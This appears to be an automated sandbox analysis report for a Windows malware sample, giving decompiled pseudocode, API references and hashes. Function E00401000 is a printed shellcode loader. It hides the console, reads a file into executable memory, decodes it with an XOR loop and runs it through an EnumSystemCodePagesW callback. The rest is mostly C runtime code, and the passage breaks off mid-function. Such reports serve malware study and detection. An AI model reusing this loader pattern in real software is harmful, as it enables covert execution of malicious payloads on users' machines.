                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: DecodePointer__invoke_watson
                                                          • String ID: 0Kw
                                                          • API String ID: 4034010525-1246214110
                                                          • Opcode ID: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
                                                          • Instruction ID: c97e1cab28a9a0a5774540a9f45a6d0117cf2650b7669a4f547a1e58f4d2c784
                                                          • Opcode Fuzzy Hash: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
                                                          • Instruction Fuzzy Hash: 99E0EC35110109BBDF022F62DD098AA3A69BB14754B404435FE0092571DA37C971ABA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 79%
                                                          			E00401000(struct HWND__* __eax, intOrPtr _a8) {
                                                          				void* _t8;
                                                          				_Unknown_base(*)()* _t20;
                                                          				void* _t23;
                                                          
                                                          				_t23 = 0;
                                                          				__imp__GetConsoleWindow(); // executed
                                                          				ShowWindow(__eax, 0); // executed
                                                          				_t8 = E0040142D( *((intOrPtr*)(_a8 + 4)), 0x413000);
                                                          				_t20 = VirtualAlloc(0, 0x1c32, 0x3000, 0x40);
                                                          				E00401381(_t20, 0x1c32, 1, _t8);
                                                          				do {
                                                          					 *(_t20 + _t23) = ((( *(_t20 + _t23) ^ 0x000000f1) + 0x00000020 ^ 0x000000d6) - 0x0000003b ^ 0x000000f1) + 0x52;
                                                          					_t23 = _t23 + 1;
                                                          				} while (_t23 < 0x1c32);
                                                          				EnumSystemCodePagesW(_t20, 0);
                                                          				return 0;
                                                          			}






                                                          0x00401006
                                                          0x00401009
                                                          0x00401010
                                                          0x00401021
                                                          0x00401045
                                                          0x00401049
                                                          0x00401051
                                                          0x00401060
                                                          0x00401063
                                                          0x00401064
                                                          0x0040106b
                                                          0x00401077

                                                          APIs
                                                          • GetConsoleWindow.KERNELBASE(00000000), ref: 00401009
                                                          • ShowWindow.USER32(00000000), ref: 00401010
                                                            • Part of subcall function 0040142D: __wfsopen.LIBCMT ref: 00401438
                                                          • VirtualAlloc.KERNEL32(00000000,00001C32,00003000,00000040), ref: 00401037
                                                          • __fread_nolock.LIBCMT ref: 00401049
                                                          • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 0040106B
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: Window$AllocCodeConsoleEnumPagesShowSystemVirtual__fread_nolock__wfsopen
                                                          • String ID:
                                                          • API String ID: 2083855422-0
                                                          • Opcode ID: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
                                                          • Instruction ID: 77e8c0aaf0c9974a4cee49b3b5cf3efa8b7ee5b121ee9e12007cb8c764029d75
                                                          • Opcode Fuzzy Hash: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
                                                          • Instruction Fuzzy Hash: BBF07D329403143FFB1027735C8AFDB3F9CD746760F004436FA086A092D574E84246B8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 239 408702-40870b 240 408711-40871a 239->240 241 4087fb-4087fd 239->241 242 408723-40872c 240->242 243 40871c-408722 call 404535 240->243 245 408735-40873e 242->245 246 40872e-408734 call 404535 242->246 243->242 248 408740-408746 call 404535 245->248 249 408747-408750 245->249 246->245 248->249 253 408752-408758 call 404535 249->253 254 408759-408762 249->254 253->254 257 408764-40876a call 404535 254->257 258 40876b-408774 254->258 257->258 261 408776-40877c call 404535 258->261 262 40877d-408786 258->262 261->262 264 408788-40878e call 404535 262->264 265 40878f-408798 262->265 264->265 269 4087a1-4087aa 265->269 270 40879a-4087a0 call 404535 265->270 273 4087b3-4087bc 269->273 274 4087ac-4087b2 call 404535 269->274 270->269 277 4087c5-4087ce 273->277 278 4087be-4087c4 call 404535 273->278 274->273 280 4087d0-4087d6 call 404535 277->280 281 4087d7-4087e0 277->281 278->277 280->281 285 4087e2-4087e8 call 404535 281->285 286 4087e9-4087f2 281->286 285->286 286->241 289 4087f4-4087fa call 404535 286->289 289->241
                                                          C-Code - Quality: 100%
                                                          			E00408702(intOrPtr _a4) {
                                                          				intOrPtr _t15;
                                                          				intOrPtr _t54;
                                                          				void* _t56;
                                                          				void* _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				void* _t61;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				void* _t64;
                                                          				void* _t65;
                                                          				void* _t66;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t54 = _a4;
                                                          				if(_t54 != 0) {
                                                          					_t2 = _t54 + 0xc; // 0xf000000
                                                          					_t56 =  *_t2 -  *0x413e34; // 0x415054
                                                          					if(_t56 != 0) {
                                                          						E00404535(_t16);
                                                          					}
                                                          					_t3 = _t54 + 0x10; // 0x254804b7
                                                          					_t57 =  *_t3 -  *0x413e38; // 0x415054
                                                          					if(_t57 != 0) {
                                                          						E00404535(_t17);
                                                          					}
                                                          					_t4 = _t54 + 0x14; // 0x8000
                                                          					_t58 =  *_t4 -  *0x413e3c; // 0x415054
                                                          					if(_t58 != 0) {
                                                          						E00404535(_t18);
                                                          					}
                                                          					_t5 = _t54 + 0x18; // 0xfc7d80
                                                          					_t59 =  *_t5 -  *0x413e40; // 0x415054
                                                          					if(_t59 != 0) {
                                                          						E00404535(_t19);
                                                          					}
                                                          					_t6 = _t54 + 0x1c; // 0x4d8b0774
                                                          					_t60 =  *_t6 -  *0x413e44; // 0x415054
                                                          					if(_t60 != 0) {
                                                          						E00404535(_t20);
                                                          					}
                                                          					_t7 = _t54 + 0x20; // 0x706183f8
                                                          					_t61 =  *_t7 -  *0x413e48; // 0x415054
                                                          					if(_t61 != 0) {
                                                          						E00404535(_t21);
                                                          					}
                                                          					_t8 = _t54 + 0x24; // 0x5de58bfd
                                                          					_t62 =  *_t8 -  *0x413e4c; // 0x415054
                                                          					if(_t62 != 0) {
                                                          						E00404535(_t22);
                                                          					}
                                                          					_t9 = _t54 + 0x38; // 0x8b55c35d
                                                          					_t63 =  *_t9 -  *0x413e60; // 0x415058
                                                          					if(_t63 != 0) {
                                                          						E00404535(_t23);
                                                          					}
                                                          					_t10 = _t54 + 0x3c; // 0x10ec83ec
                                                          					_t64 =  *_t10 -  *0x413e64; // 0x415058
                                                          					if(_t64 != 0) {
                                                          						E00404535(_t24);
                                                          					}
                                                          					_t11 = _t54 + 0x40; // 0x758b5653
                                                          					_t65 =  *_t11 -  *0x413e68; // 0x415058
                                                          					if(_t65 != 0) {
                                                          						E00404535(_t25);
                                                          					}
                                                          					_t12 = _t54 + 0x44; // 0x74f6850c
                                                          					_t66 =  *_t12 -  *0x413e6c; // 0x415058
                                                          					if(_t66 != 0) {
                                                          						E00404535(_t26);
                                                          					}
                                                          					_t13 = _t54 + 0x48; // 0x105d8b18
                                                          					_t67 =  *_t13 -  *0x413e70; // 0x415058
                                                          					if(_t67 != 0) {
                                                          						E00404535(_t27);
                                                          					}
                                                          					_t14 = _t54 + 0x4c; // 0x1174db85
                                                          					_t15 =  *_t14;
                                                          					_t68 = _t15 -  *0x413e74; // 0x415058
                                                          					if(_t68 != 0) {
                                                          						return E00404535(_t15);
                                                          					}
                                                          				}
                                                          				return _t15;
                                                          			}


















                                                          0x00408706
                                                          0x0040870b
                                                          0x00408711
                                                          0x00408714
                                                          0x0040871a
                                                          0x0040871d
                                                          0x00408722
                                                          0x00408723
                                                          0x00408726
                                                          0x0040872c
                                                          0x0040872f
                                                          0x00408734
                                                          0x00408735
                                                          0x00408738
                                                          0x0040873e
                                                          0x00408741
                                                          0x00408746
                                                          0x00408747
                                                          0x0040874a
                                                          0x00408750
                                                          0x00408753
                                                          0x00408758
                                                          0x00408759
                                                          0x0040875c
                                                          0x00408762
                                                          0x00408765
                                                          0x0040876a
                                                          0x0040876b
                                                          0x0040876e
                                                          0x00408774
                                                          0x00408777
                                                          0x0040877c
                                                          0x0040877d
                                                          0x00408780
                                                          0x00408786
                                                          0x00408789
                                                          0x0040878e
                                                          0x0040878f
                                                          0x00408792
                                                          0x00408798
                                                          0x0040879b
                                                          0x004087a0
                                                          0x004087a1
                                                          0x004087a4
                                                          0x004087aa
                                                          0x004087ad
                                                          0x004087b2
                                                          0x004087b3
                                                          0x004087b6
                                                          0x004087bc
                                                          0x004087bf
                                                          0x004087c4
                                                          0x004087c5
                                                          0x004087c8
                                                          0x004087ce
                                                          0x004087d1
                                                          0x004087d6
                                                          0x004087d7
                                                          0x004087da
                                                          0x004087e0
                                                          0x004087e3
                                                          0x004087e8
                                                          0x004087e9
                                                          0x004087e9
                                                          0x004087ec
                                                          0x004087f2
                                                          0x00000000
                                                          0x004087fa
                                                          0x004087f2
                                                          0x004087fd

                                                          APIs
                                                          • _free.LIBCMT ref: 0040871D
                                                            • Part of subcall function 00404535: HeapFree.KERNEL32(00000000,00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 00404549
                                                            • Part of subcall function 00404535: GetLastError.KERNEL32(00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 0040455B
                                                          • _free.LIBCMT ref: 0040872F
                                                          • _free.LIBCMT ref: 00408741
                                                          • _free.LIBCMT ref: 00408753
                                                          • _free.LIBCMT ref: 00408765
                                                          • _free.LIBCMT ref: 00408777
                                                          • _free.LIBCMT ref: 00408789
                                                          • _free.LIBCMT ref: 0040879B
                                                          • _free.LIBCMT ref: 004087AD
                                                          • _free.LIBCMT ref: 004087BF
                                                          • _free.LIBCMT ref: 004087D1
                                                          • _free.LIBCMT ref: 004087E3
                                                          • _free.LIBCMT ref: 004087F5
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
                                                          • Instruction ID: f04fc6fc6f9de8751afe861eb1d73b392140216a2a145ff1f7222b8b789f6bc8
                                                          • Opcode Fuzzy Hash: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
                                                          • Instruction Fuzzy Hash: 7B212FB2504304BBC624EF29FDC1C5673F9AA443127A4482EF285F76D5DA78FD808A2C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 91%
                                                          			E0040304B(void* __ebx, void* __edi, void* __eflags) {
                                                          				void* __esi;
                                                          				void* _t3;
                                                          				intOrPtr _t6;
                                                          				long _t14;
                                                          				long* _t27;
                                                          
                                                          				E004031FA(_t3);
                                                          				if(E004044E7() != 0) {
                                                          					_t6 = E00403D67(E00402DDC);
                                                          					 *0x413508 = _t6;
                                                          					__eflags = _t6 - 0xffffffff;
                                                          					if(_t6 == 0xffffffff) {
                                                          						goto L1;
                                                          					} else {
                                                          						_t27 = E0040456D(1, 0x3bc);
                                                          						__eflags = _t27;
                                                          						if(_t27 == 0) {
                                                          							L6:
                                                          							E004030C1();
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						} else {
                                                          							__eflags = E00403DC3( *0x413508, _t27);
                                                          							if(__eflags == 0) {
                                                          								goto L6;
                                                          							} else {
                                                          								_push(0);
                                                          								_push(_t27);
                                                          								E00402F98(__ebx, __edi, _t27, __eflags);
                                                          								_t14 = GetCurrentThreadId();
                                                          								_t27[1] = _t27[1] | 0xffffffff;
                                                          								 *_t27 = _t14;
                                                          								__eflags = 1;
                                                          								return 1;
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					L1:
                                                          					E004030C1();
                                                          					return 0;
                                                          				}
                                                          			}








                                                          0x0040304b
                                                          0x00403057
                                                          0x00403066
                                                          0x0040306b
                                                          0x00403071
                                                          0x00403074
                                                          0x00000000
                                                          0x00403076
                                                          0x00403083
                                                          0x00403087
                                                          0x00403089
                                                          0x004030b8
                                                          0x004030b8
                                                          0x004030bd
                                                          0x004030c0
                                                          0x0040308b
                                                          0x00403099
                                                          0x0040309b
                                                          0x00000000
                                                          0x0040309d
                                                          0x0040309d
                                                          0x0040309f
                                                          0x004030a0
                                                          0x004030a7
                                                          0x004030ad
                                                          0x004030b1
                                                          0x004030b5
                                                          0x004030b7
                                                          0x004030b7
                                                          0x0040309b
                                                          0x00403089
                                                          0x00403059
                                                          0x00403059
                                                          0x00403059
                                                          0x00403060
                                                          0x00403060

                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 0040304B
                                                            • Part of subcall function 004031FA: RtlEncodePointer.NTDLL(00000000,?,00403050,0040157E,00411EA0,00000014), ref: 004031FD
                                                            • Part of subcall function 004031FA: __initp_misc_winsig.LIBCMT ref: 00403218
                                                            • Part of subcall function 004031FA: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00403E5A
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00403E6E
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00403E81
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00403E94
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00403EA7
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00403EBA
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00403ECD
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00403EE0
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00403EF3
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00403F06
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00403F19
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00403F2C
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00403F3F
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00403F52
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00403F65
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00403F78
                                                          • __mtinitlocks.LIBCMT ref: 00403050
                                                          • __mtterm.LIBCMT ref: 00403059
                                                            • Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0040305E,0040157E,00411EA0,00000014), ref: 00404401
                                                            • Part of subcall function 004030C1: _free.LIBCMT ref: 00404408
                                                            • Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(pKA,?,?,0040305E,0040157E,00411EA0,00000014), ref: 0040442A
                                                          • __calloc_crt.LIBCMT ref: 0040307E
                                                          • __initptd.LIBCMT ref: 004030A0
                                                          • GetCurrentThreadId.KERNEL32 ref: 004030A7
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: 8f3acd18d51e263f485451ab3dc762e6cf44a6e123e8e9d85ed5d8a7ab98aedc
                                                          • Instruction ID: 2115b65a6a9c202ad142230a1a1e4feb1784a8349ca752f000b05186f7d9f433
                                                          • Opcode Fuzzy Hash: 8f3acd18d51e263f485451ab3dc762e6cf44a6e123e8e9d85ed5d8a7ab98aedc
                                                          • Instruction Fuzzy Hash: 49F06D3216A6112DE6387F766C07A4B2E9C8F01B7AF20463FF560B51D6EE398A81419C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 316 40916c-409179 317 409193 316->317 318 40917b-409180 316->318 319 409195-40919a 317->319 318->317 320 409182-409185 318->320 321 409187-40918c 320->321 322 40919b-4091b1 call 405da9 320->322 321->317 324 40918e-409190 321->324 326 4091b3-4091b8 322->326 327 4091c8-4091d9 call 409121 322->327 324->317 328 4091c0-4091c3 326->328 329 4091ba-4091bd 326->329 335 40921b-40923c MultiByteToWideChar 327->335 336 4091db-4091e2 327->336 331 40924c-409250 328->331 329->328 333 409252-409255 331->333 334 409259-40925c 331->334 333->334 334->319 335->331 337 40923e-409246 call 4024c9 335->337 338 4091e4-4091e7 336->338 339 40920b 336->339 337->331 341 4091e9-409209 MultiByteToWideChar 338->341 342 40920e 338->342 339->342 341->339 345 409216-409219 341->345 342->337 343 409210-409214 342->343 343->337 343->345 345->331
                                                          C-Code - Quality: 100%
                                                          			E0040916C(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v20;
                                                          				signed int _t35;
                                                          				int _t38;
                                                          				signed int _t41;
                                                          				int _t42;
                                                          				intOrPtr* _t44;
                                                          				int _t47;
                                                          				short* _t49;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				int _t55;
                                                          				signed int _t59;
                                                          				char* _t62;
                                                          
                                                          				_t62 = _a8;
                                                          				if(_t62 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t50 = _a12;
                                                          				if(_t50 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if( *_t62 != 0) {
                                                          					E00405DA9( &_v20, _a16);
                                                          					_t35 = _v20;
                                                          					__eflags =  *(_t35 + 0xa8);
                                                          					if( *(_t35 + 0xa8) != 0) {
                                                          						_t38 = E00409121( *_t62 & 0x000000ff,  &_v20);
                                                          						__eflags = _t38;
                                                          						if(_t38 == 0) {
                                                          							__eflags = _a4;
                                                          							_t41 = _v20;
                                                          							_t59 = 1;
                                                          							_t28 = _t41 + 4; // 0x840ffff8
                                                          							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                          							__eflags = _t42;
                                                          							if(_t42 != 0) {
                                                          								L21:
                                                          								__eflags = _v8;
                                                          								if(_v8 != 0) {
                                                          									_t54 = _v12;
                                                          									_t31 = _t54 + 0x70;
                                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                          									__eflags =  *_t31;
                                                          								}
                                                          								return _t59;
                                                          							}
                                                          							L20:
                                                          							_t44 = E004024C9();
                                                          							_t59 = _t59 | 0xffffffff;
                                                          							__eflags = _t59;
                                                          							 *_t44 = 0x2a;
                                                          							goto L21;
                                                          						}
                                                          						_t59 = _v20;
                                                          						__eflags =  *(_t59 + 0x74) - 1;
                                                          						if( *(_t59 + 0x74) <= 1) {
                                                          							L15:
                                                          							_t20 = _t59 + 0x74; // 0xe1c11fe1
                                                          							__eflags = _t50 -  *_t20;
                                                          							L16:
                                                          							if(__eflags < 0) {
                                                          								goto L20;
                                                          							}
                                                          							__eflags = _t62[1];
                                                          							if(_t62[1] == 0) {
                                                          								goto L20;
                                                          							}
                                                          							L18:
                                                          							_t22 = _t59 + 0x74; // 0xe1c11fe1
                                                          							_t59 =  *_t22;
                                                          							goto L21;
                                                          						}
                                                          						_t12 = _t59 + 0x74; // 0xe1c11fe1
                                                          						__eflags = _t50 -  *_t12;
                                                          						if(__eflags < 0) {
                                                          							goto L16;
                                                          						}
                                                          						__eflags = _a4;
                                                          						_t17 = _t59 + 0x74; // 0xe1c11fe1
                                                          						_t18 = _t59 + 4; // 0x840ffff8
                                                          						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                          						_t59 = _v20;
                                                          						__eflags = _t47;
                                                          						if(_t47 != 0) {
                                                          							goto L18;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          					_t55 = _a4;
                                                          					__eflags = _t55;
                                                          					if(_t55 != 0) {
                                                          						 *_t55 =  *_t62 & 0x000000ff;
                                                          					}
                                                          					_t59 = 1;
                                                          					goto L21;
                                                          				}
                                                          				_t49 = _a4;
                                                          				if(_t49 != 0) {
                                                          					 *_t49 = 0;
                                                          				}
                                                          				goto L5;
                                                          			}


















                                                          0x00409174
                                                          0x00409179
                                                          0x00409193
                                                          0x00000000
                                                          0x00409193
                                                          0x0040917b
                                                          0x00409180
                                                          0x00000000
                                                          0x00000000
                                                          0x00409185
                                                          0x004091a2
                                                          0x004091a7
                                                          0x004091aa
                                                          0x004091b1
                                                          0x004091d0
                                                          0x004091d7
                                                          0x004091d9
                                                          0x0040921d
                                                          0x00409229
                                                          0x0040922c
                                                          0x00409231
                                                          0x00409234
                                                          0x0040923a
                                                          0x0040923c
                                                          0x0040924c
                                                          0x0040924c
                                                          0x00409250
                                                          0x00409252
                                                          0x00409255
                                                          0x00409255
                                                          0x00409255
                                                          0x00409255
                                                          0x00000000
                                                          0x0040925b
                                                          0x0040923e
                                                          0x0040923e
                                                          0x00409243
                                                          0x00409243
                                                          0x00409246
                                                          0x00000000
                                                          0x00409246
                                                          0x004091db
                                                          0x004091de
                                                          0x004091e2
                                                          0x0040920b
                                                          0x0040920b
                                                          0x0040920b
                                                          0x0040920e
                                                          0x0040920e
                                                          0x00000000
                                                          0x00000000
                                                          0x00409210
                                                          0x00409214
                                                          0x00000000
                                                          0x00000000
                                                          0x00409216
                                                          0x00409216
                                                          0x00409216
                                                          0x00000000
                                                          0x00409216
                                                          0x004091e4
                                                          0x004091e4
                                                          0x004091e7
                                                          0x00000000
                                                          0x00000000
                                                          0x004091eb
                                                          0x004091f5
                                                          0x004091fb
                                                          0x004091fe
                                                          0x00409204
                                                          0x00409207
                                                          0x00409209
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00409209
                                                          0x004091b3
                                                          0x004091b6
                                                          0x004091b8
                                                          0x004091bd
                                                          0x004091bd
                                                          0x004091c2
                                                          0x00000000
                                                          0x004091c2
                                                          0x00409187
                                                          0x0040918c
                                                          0x00409190
                                                          0x00409190
                                                          0x00000000

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004091A2
                                                          • __isleadbyte_l.LIBCMT ref: 004091D0
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 004091FE
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00409234
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID: .\@
                                                          • API String ID: 3058430110-2906710320
                                                          • Opcode ID: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
                                                          • Instruction ID: de8054beb32b7dc64be8669cb2ea50c94ab5c5166fc26728190ff957983d3686
                                                          • Opcode Fuzzy Hash: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
                                                          • Instruction Fuzzy Hash: 0A31A130604206BFEB218E65CC48BAB7BA5FF41310F15487EE864AB2D2D738DC51DB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 346 4011bc-4011d5 347 4011f2 346->347 348 4011d7-4011dc 346->348 349 4011f4-4011fa 347->349 348->347 350 4011de-4011e0 348->350 351 4011e2-4011e7 call 4024c9 350->351 352 4011fb-401200 350->352 360 4011ed call 4017ee 351->360 353 401202-40120c 352->353 354 40120e-401212 352->354 353->354 356 401232-401241 353->356 357 401222-401224 354->357 358 401214-40121f call 401b60 354->358 363 401243-401246 356->363 364 401248 356->364 357->351 362 401226-401230 357->362 358->357 360->347 362->351 362->356 367 40124d-401252 363->367 364->367 368 401258-40125f 367->368 369 40133b-40133e 367->369 370 4012a0-4012a2 368->370 371 401261-401269 368->371 369->349 373 4012a4-4012a6 370->373 374 40130c-401316 call 401829 370->374 371->370 372 40126b 371->372 375 401271-401273 372->375 376 401369 372->376 377 4012a8-4012b0 373->377 378 4012ca-4012d5 373->378 384 40136d-401376 374->384 392 401318-40131d 374->392 382 401275-401277 375->382 383 40127a-40127f 375->383 376->384 385 4012c0-4012c4 377->385 386 4012b2-4012be 377->386 380 4012d7 378->380 381 4012d9-4012dc 378->381 380->381 388 401343-401347 381->388 389 4012de-4012e9 call 40194a 381->389 382->383 383->388 390 401285-40129e call 401ade 383->390 384->349 391 4012c6-4012c8 385->391 386->391 393 401359-401364 call 4024c9 388->393 394 401349-401356 call 401b60 388->394 404 4012ea call 401d04 389->404 406 401301-40130a 390->406 391->381 392->388 397 40131f-401330 392->397 393->360 394->393 402 401333-401335 397->402 402->368 402->369 407 4012ef-4012f4 404->407 406->402 408 4012fa-4012fd 407->408 409 40137b-40137f 407->409 408->376 410 4012ff 408->410 409->384 410->406
                                                          C-Code - Quality: 69%
                                                          			E004011BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                          				char* _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				signed int _t74;
                                                          				signed int _t78;
                                                          				char _t81;
                                                          				signed int _t86;
                                                          				signed int _t88;
                                                          				signed int _t91;
                                                          				signed int _t94;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				char* _t99;
                                                          				signed int _t100;
                                                          				signed int _t102;
                                                          				signed int _t103;
                                                          				signed int _t104;
                                                          				char* _t110;
                                                          				signed int _t113;
                                                          				signed int _t117;
                                                          				signed int _t119;
                                                          				void* _t120;
                                                          
                                                          				_t99 = _a4;
                                                          				_t74 = _a8;
                                                          				_v8 = _t99;
                                                          				_v12 = _t74;
                                                          				if(_a12 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t97 = _a16;
                                                          				if(_t97 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if(_t99 != 0) {
                                                          					_t119 = _a20;
                                                          					__eflags = _t119;
                                                          					if(_t119 == 0) {
                                                          						L9:
                                                          						__eflags = _a8 - 0xffffffff;
                                                          						if(_a8 != 0xffffffff) {
                                                          							_t74 = E00401B60(_t99, 0, _a8);
                                                          							_t120 = _t120 + 0xc;
                                                          						}
                                                          						__eflags = _t119;
                                                          						if(_t119 == 0) {
                                                          							goto L3;
                                                          						} else {
                                                          							_t78 = _t74 | 0xffffffff;
                                                          							__eflags = _t97 - _t78 / _a12;
                                                          							if(_t97 > _t78 / _a12) {
                                                          								goto L3;
                                                          							}
                                                          							L13:
                                                          							_t117 = _a12 * _t97;
                                                          							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          							_t98 = _t117;
                                                          							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                          								_t100 = 0x1000;
                                                          							} else {
